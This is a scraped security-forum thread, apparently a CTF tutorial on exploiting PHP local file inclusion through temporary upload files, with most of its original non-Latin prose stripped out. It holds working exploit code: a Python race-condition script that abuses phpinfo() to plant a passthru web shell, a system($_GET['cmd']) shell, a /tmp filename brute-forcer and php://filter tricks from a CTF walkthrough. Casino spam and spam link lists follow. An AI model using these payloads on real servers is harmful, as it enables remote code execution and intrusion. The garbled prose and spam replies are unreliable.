-Security 4 Ever

-Security 4 Ever (https://www.sec4ever.com/home/index.php)
-   (https://www.sec4ever.com/home/forumdisplay.php?f=183)
-   -   [] ctf tips & tricks (https://www.sec4ever.com/home/showthread.php?t=19848)

MtucX 13-07-2020 09:31 AM

ctf tips & tricks
 











CTF TIPS & TRICKS


ctf

https://www.sec4ever.com/home/showthread.php?t=19843

# LFI WITH TMP FILES

## Understanding PHP temporary files



https://www.php.net/manual/en/featur...ost-method.php

https://www.macs.hw.ac.uk/~hwloidl/d...le-upload.html

POST put method
, , global variables $_files



https://h4dla3.github.io/images/2020-07-10_094131.png



https://arabicprogrammer.com/article/8708534101/

default temp dir

by default

php.ini

https://h4dla3.github.io/images/2020-07-10_105221.png

d:/phpstudy_pro/temp

; upload_tmp_dir

wamp c:/wamp/tmp

php.ini

ubuntu

:

cat /etc/php/7.0/apache2/php.ini | grep upload_tmp
;upload_tmp_dir =

upload_tmp_dir writable .
system default temp dir .



upload_tmp_dir

temp directory

sys_get_temp_dir()
:

default

C:\Users\lol>php -r "echo sys_get_temp_dir();"
C:\Users\lol\AppData\Local\Temp

edited
php.ini

sys_temp_dir = "D:/phpstudy_pro/temp"

C:\Users\lol>php -r "echo sys_get_temp_dir();"
D:/phpstudy_pro/temp
C:\Users\lol>

ubuntu

:

➜ ~ php -r "echo sys_get_temp_dir();"
/tmp
➜  ~

##


temp directory
: php+4 php+6

:


:

php
<?php
$file = tmpfile();
$path = stream_get_meta_data($file)['uri'];
print $path."\n";

windows


https://h4dla3.github.io/images/2020-07-10_121408.png



php????.tmp

tmp

linux


Linux

php??????


https://h4dla3.github.io/images/2020-07-10_123241.png



GetTempFileName()
and mkstemp()



https://stackoverflow.com/questions/...-php-generated

https://linux.die.net/man/3/mktemp

https://linux.die.net/man/3/mkstemp

https://stackoverflow.com/questions/...ame-uniqueness

https://github.com/php/php-src/blob/...mporary_file.c

PHP_LFI_rfc1867_temporary_files




PHP POST.


https://h4dla3.github.io/images/2020-07-10_110539.png



https://h4dla3.github.io/images/2020-07-10_1105391.png

php

form request

###

php

crash .

##

1 - lfi


2 - /proc/self/fd/* * 10 . .


3 - . FindFirstFile method
fimap

https://github.com/kurobeats/fimap/w...rstFileExploit

## Exploiting time




## LFI With PHPInfo Assistance


https://insomniasec.com/cdn-assets/L...Assistance.pdf

http://gynvael.coldwind.pl/download....rary_files.pdf


local file include
....
phpinfo() script



:

index.php

php
<?php
include($_GET['file']);
?>

:

info.php
php
<?php
phpinfo();
?>

PHP .


https://h4dla3.github.io/images/2020-07-09_214428.png

https://h4dla3.github.io/images/2020-07-09_214614.png


upload post phpinfo

LFI


php

race condition.



:

python
import requests
import ssl
import socket
import urllib3

def SubstrFind(resp, toFind):
        if(len(toFind) > len(resp)):
                return []

        found = False
        indexes = []

        for x in range(0,(len(resp)-len(toFind))+1):
                if(ord(resp[x]) == ord(toFind[0])):
                        found = True
                        for i in range(0,len(toFind)):
                                if(ord(resp[x+i]) != ord(toFind[i])):
                                        found = False
                                        break
                if(found):
                        indexes.append(x)
                        found = False
                        x += len(toFind)

        return indexes

def phpinfo_ext(content):
        indexes = SubstrFind(content, "Security Test")
        found = len(indexes) > 0
        got = ""

        if(found):
                start = indexes[0]+11
                for x in range(start, len(content)):
                        if(content[x] == '<'):
                                break
                        got += content[x]

        return got

def phpinfo_request():
        TAG="Security Test"
        PAYLOAD="""%s\r
<?php $c=fopen('/tmp/ccc','w');fwrite($c,'<?php passthru($_GET["f"]);?>');?>\r""" % TAG
        REQ1_DATA="""-----------------------------7dbff1ded0714\r
Content-Disposition: form-data; name="dummyname"; filename="test.txt"\r
Content-Type: text/plain\r
\r
%s
-----------------------------7dbff1ded0714--\r""" % PAYLOAD
        padding="A" * 6000
        REQ1="""POST /info.php"""""" HTTP/1.1\r
Z: """+padding+"""\r
Cookie: othercookie="""+padding+"""\r
HTTP_ACCEPT: """ + padding + """\r
HTTP_USER_AGENT: """+padding+"""\r
HTTP_ACCEPT_LANGUAGE: """+padding+"""\r
HTTP_PRAGMA: """+padding+"""\r
Content-Type: multipart/form-data; boundary=---------------------------7dbff1ded0714\r
Content-Length: %s\r
Host: 127.0.0.1\r
\r
%s""" %(len(REQ1_DATA),REQ1_DATA)

        got = ""
        sc = urllib3.connection_from_url('http://127.0.0.1')._new_conn()
        sc.connect()
        sc = sc.sock

        payload = REQ1
        sc.send(payload)

        resp = ''
        while 'tmp_name' not in resp:
                x = sc.recv(4096)
                if x == '':
                        break
                resp += x
        if("tmp_name" in resp):
                found = 1
                lines = resp.split('\n')
                for line in lines:
                        if "tmp_name]" in line:
                                mystr = str(line)
                                array = mystr.split()
                                tmp_name = array[2]
                                print(tmp_name)
                                break
                tmp_url = "http://127.0.0.1/index.php?file=" + tmp_name
                r = requests.get(tmp_url)#

                content = r.content
                if 'Security Test' in content:
                        print "done"
                        exit()
                else:
                        print('wait ... ')

        return got
               


while True:
        print(phpinfo_request())

:

bash
sudo inotifywait -m -r /tmp

https://h4dla3.github.io/images/2020-07-10_153338.png


ccc






https://h4dla3.github.io/images/2020-07-10_154005.png

ctf challenge : https://h4dla3.github.io/post/eagle-jump/

docker container : https://github.com/vulhub/vulhub/tre.../php/inclusion


## ( php7 segment fault ) using php://filter/string.strip_tags


https://bugs.php.net/bug.php?id=75535

php

php7.0.0-7.1.2

php7.1.3-7.2.1

php7.2.2-7.2.8


lfi
php://filter/string.strip_tags
php
crash

( )


upload_tmp_dir
directory
.


segment fault
null pointer refernce


. `atoi(NULL)`







https://h4dla3.github.io/images/2020-07-10_173120.png

crash

https://h4dla3.github.io/images/2020-07-10_173327.png




:

php
<?php
include($_GET['file']);
?>


browser



https://h4dla3.github.io/images/2020-07-10_172649.png







https://h4dla3.github.io/images/2020-07-10_153338.png

https://h4dla3.github.io/images/2020-07-10_1105391.png







:

mtucx.txt

php
<?php
echo 'mtucx';
system($_GET['cmd']);
>

https://h4dla3.github.io/images/2020-07-10_174146.png



2

crash





https://h4dla3.github.io/images/2020-07-10_174402.png

tmp filename



burp wfuzz gobuster dirbuster ... etc





https://h4dla3.github.io/images/2020-07-10_200751.png





python script
:

python
#!/usr/bin/env python
# -*- coding: utf-8 -*-

import requests, random
import datetime

charset = "qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890"

base_url = "http://127.0.0.1"

def get_filename():
    ret = ""
    for i in range(6):
        ret += random.choice(charset)
    return ret

def brute_force_tmp_files():
    filename = get_filename()
    url = "{}/index.php?lfi=/tmp/php{}".format(base_url, filename)
    print "php" + filename
    try:
        r = requests.get(url)
        if 'mtucx' in r.text:
            print "[+] Include success!"
            print url
            exit()
    except Exception as e:
        pass


def main():
    flag = False
    while 1:
        brute_force_tmp_files()
        pass


if __name__ == "__main__":
    main()

burpsuite
burpsuite

https://h4dla3.github.io/images/2020-07-10_200156.png




....

https://h4dla3.github.io/images/2020-07-10_204834.png

# ctf

fuzz

https://h4dla3.github.io/images/2020-07-10_191555.png

dir.php




https://h4dla3.github.io/images/2020-07-10_191636.png


md5 ==

pass=md5(??)&



https://h4dla3.github.io/images/2020-07-10_191803.png



:

bash
C:\Users\lol\Desktop\ffuf_1.0.2_windows_amd64>python -c "print len('fa25e54758d5d5c1927781a6ede89f8a')"
32

C:\Users\lol\Desktop\ffuf_1.0.2_windows_amd64>


32 32 == md5



https://h4dla3.github.io/images/2020-07-10_192103.png

redirect
flflflflfag.php



https://h4dla3.github.io/images/2020-07-10_192159.png

lfi

php://filter/convret.base64-encode/resource=



:

ttp://61da71ac-e4d7-4eac-96c2-58cbde529147.node3.buuoj.cn/flflflflag.php?file=php://filter/convert.base64-encode/resource=flflflflag.php

http://61da71ac-e4d7-4eac-96c2-58cbde529147.node3.buuoj.cn/flflflflag.php?file=php://filter/convert.base64-encode/resource=dir.php


decode base64

:

php
flflflflag.php

<?php
$file=$_GET['file'];
if(preg_match('/data|input|zip/is',$file)){
        die('nonono');
}
@include($file);
echo 'include($_GET["file"])';
?>

dir.php

<?php
var_dump(scandir('/tmp'));

flflflflag.php
data ....
dir.php tmp directory

https://h4dla3.github.io/images/2020-07-10_191736.png





https://h4dla3.github.io/images/2020-07-10_192525.png



https://h4dla3.github.io/images/2020-07-10_192556.png

dir.php


https://h4dla3.github.io/images/2020-07-10_192654.png

include

https://h4dla3.github.io/images/2020-07-10_192727.png

disable function

:

disable_functions pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_get_handler,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,pcntl_async_signals,system,exec,shell_exec,popen,proc_open,passthru,symlink,link,syslog,imap_open,ld,mail,scadnir,readfile,show_source,fpassthru,readdir
eval
https://h4dla3.github.io/images/2020-07-10_192923.png

https://h4dla3.github.io/images/2020-07-10_193037.png



https://h4dla3.github.io/images/2020-07-10_193822.png

## 3 ( convert.quoted-printable-encode )


...

RobertFralo 30-07-2020 01:22 PM

: ctf tips & tricks
 
online casino GunsBet https://gunsbet.xyz

Zacesebaqoo 11-08-2020 08:37 PM

: ctf tips & tricks
 
. , . , . , . , , .
.
.
, . . , . bcpl , .
. , , , , . , , , .
, , , , , . . . , , .
, , . , , , , , , . , .
, , .
, 10 , , , , , .
, , . , , , , .




http://www.schluessel-herrin.com/for...d.php?p=218920
http://atcheats.com/showthread.php?tid=156571
http://www.multiple-avenues.com/foru...-Card-Discount
http://dl3modern.com/vb/showthread.php?p=1206887
http://forum.muhanoixua.com.vn/showt...9A%D0%A1%D0%82
http://moussa-sror.com/vb/showthread.php?p=222543
http://dankgaminginc.com/showthread.php?tid=82040
http://aldradach.drachenfest.info/fo...?f=18&t=606025
http://188.128.165.51/forum_Asdasd/v...f=25&t=1013749
http://188.128.165.51/forum_Asdasd/v...?f=25&t=601300


12:37 AM

Powered by vBulletin® Copyright ©2000 - 2020, Jelsoft Enterprises Ltd.